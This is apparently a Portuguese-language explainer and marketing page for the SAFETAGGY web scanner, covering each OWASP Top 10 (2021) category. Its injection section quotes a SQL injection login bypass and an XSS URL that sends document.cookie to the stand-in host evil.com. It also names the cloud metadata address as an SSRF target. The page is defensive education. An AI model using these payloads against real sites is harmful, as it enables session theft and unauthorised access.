OWASP Top 10 (2021) explicado em português
O OWASP Top 10 é a referência mundial das vulnerabilidades mais críticas em aplicações web. Este guia explica cada categoria em português, com exemplos práticos e como o SAFETAGGY ajuda a detectá-las.
A01Broken Access Control (Controle de acesso quebrado)
Ocorre quando usuários conseguem acessar recursos ou ações que não deveriam. É a vulnerabilidade mais comum em aplicações web.
Exemplo real: Um usuário comum acessa /api/users/123/dados trocando o ID para ver dados de outro usuário (IDOR).
SAFETAGGY detecta: diretórios expostos, páginas de admin acessíveis, endpoints sem autenticação. O Deep Scan testa IDOR e escalonamento de privilégios.
A02Cryptographic Failures (Falhas criptográficas)
Dados sensíveis transmitidos ou armazenados sem criptografia adequada. Inclui certificados expirados, TLS desatualizado e hashing fraco.
Exemplo real: Site de e-commerce usando HTTP (sem TLS) na página de checkout, expondo dados de cartão em texto plano.
SAFETAGGY detecta: ausência de HTTPS, certificado inválido, TLS 1.0/1.1, HSTS ausente, mixed content (HTTP em página HTTPS).
A03Injection (Injeção)
Dados não confiáveis são enviados a um interpretador como parte de um comando ou query. Inclui SQL injection, XSS, command injection e LDAP injection.
Exemplo real: Veja exemplos clássicos abaixo:
-- SQL Injection em campo de login SELECT * FROM users WHERE email = '' OR 1=1 --' AND password = '...' // XSS refletido em campo de busca https://site.com/busca?q=<script>document.location='https://evil.com?c='+document.cookie</script>
SAFETAGGY detecta: CSP ausente (proteção contra XSS), X-Content-Type-Options ausente. O Deep Scan testa SQL injection (sqlmap), XSS (dalfox) e command injection (commix) ativamente.
A04Insecure Design (Design inseguro)
Falhas fundamentais na arquitetura da aplicação que não podem ser corrigidas apenas com código. Envolve falta de modelagem de ameaças e controles de segurança por design.
Exemplo real: Sistema de recuperação de senha que pergunta "qual o nome do seu pet?" em vez de enviar um link por e-mail, permitindo engenharia social.
SAFETAGGY detecta: formulários sem CSRF token, ausência de rate limiting em endpoints de autenticação.
A05Security Misconfiguration (Configuração incorreta)
Configurações padrão inseguras, headers ausentes, mensagens de erro detalhadas ou serviços desnecessários expostos.
Exemplo real: Aplicação em produção com stack traces visíveis no erro 500, revelando caminhos internos e versões de bibliotecas.
SAFETAGGY detecta: headers de segurança ausentes (CSP, HSTS, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy), server version disclosure, diretórios listáveis.
A06Vulnerable and Outdated Components (Componentes vulneráveis)
Uso de bibliotecas, frameworks ou dependências com vulnerabilidades conhecidas (CVEs).
Exemplo real: Site usando jQuery 2.x com XSS conhecido, ou WordPress com plugin desatualizado permitindo upload de arquivos maliciosos.
SAFETAGGY detecta: tech stack identificado na varredura (frameworks e versões), SRI ausente em scripts de CDN. O Deep Scan usa nuclei para buscar CVEs conhecidos nos componentes detectados.
A07Identification and Authentication Failures (Falhas de autenticação)
Falhas no sistema de login e gerenciamento de sessão, como senhas fracas permitidas, brute force sem proteção ou tokens de sessão previsíveis.
Exemplo real: Endpoint de login sem rate limiting, permitindo ataques de força bruta automatizados.
SAFETAGGY detecta: cookies sem flags Secure e HttpOnly, formulários de login sem HTTPS, autocomplete habilitado em campos de senha.
A08Software and Data Integrity Failures (Falhas de integridade)
Código ou dados de fontes externas são usados sem verificação de integridade. Inclui dependências não verificadas e pipelines de CI/CD inseguros.
Exemplo real: Script de analytics carregado de CDN sem atributo integrity (SRI). Se o CDN for comprometido, o script malicioso é executado no seu site.
SAFETAGGY detecta: scripts externos sem SRI, ausência de CSP, recursos carregados via HTTP em páginas HTTPS (mixed content).
A09Security Logging and Monitoring Failures (Falhas de monitoramento)
Ausência de logs de segurança adequados, monitoramento e resposta a incidentes. Sem visibilidade, ataques passam despercebidos por semanas ou meses.
Exemplo real: Brute force no login acontece por dias sem gerar alertas porque não há monitoramento de tentativas falhas.
SAFETAGGY detecta: use varreduras agendadas com webhooks para monitoramento contínuo de segurança. O relatório de conformidade destaca gaps de monitoramento.
A10Server-Side Request Forgery (SSRF)
A aplicação faz requisições HTTP a URLs fornecidas pelo usuário sem validação, permitindo acesso a recursos internos da infraestrutura.
Exemplo real: Funcionalidade "importar imagem via URL" que permite acessar http://169.254.169.254/ para roubar credenciais de cloud.
SAFETAGGY detecta: o Deep Scan testa endpoints que aceitam URLs contra SSRF. O SAFETAGGY valida webhooks contra IPs privados como medida de proteção.
Resumo: OWASP Top 10 e SAFETAGGY
| Categoria | Varredura padrão | Deep Scan |
|---|---|---|
| A01 — Broken Access Control | Diretórios expostos, admin aberto | IDOR, escalação de privilégios |
| A02 — Cryptographic Failures | HTTPS, TLS, HSTS, mixed content | testssl.sh (cifras, certificados) |
| A03 — Injection | CSP, X-Content-Type-Options | sqlmap, dalfox, commix |
| A04 — Insecure Design | CSRF token, rate limiting | — |
| A05 — Security Misconfiguration | 6 headers, server disclosure | nuclei, nmap, ffuf |
| A06 — Vulnerable Components | Tech stack, SRI | nuclei (CVE scanning) |
| A07 — Authentication Failures | Cookie flags, autocomplete | — |
| A08 — Integrity Failures | SRI, CSP, mixed content | — |
| A09 — Monitoring Failures | Relatório de conformidade | — |
| A10 — SSRF | — | Testes de SSRF em endpoints |
Descubra quais riscos do OWASP Top 10 afetam seu site
Execute uma varredura gratuita e veja quais categorias do OWASP Top 10 precisam de atenção.
Iniciar varredura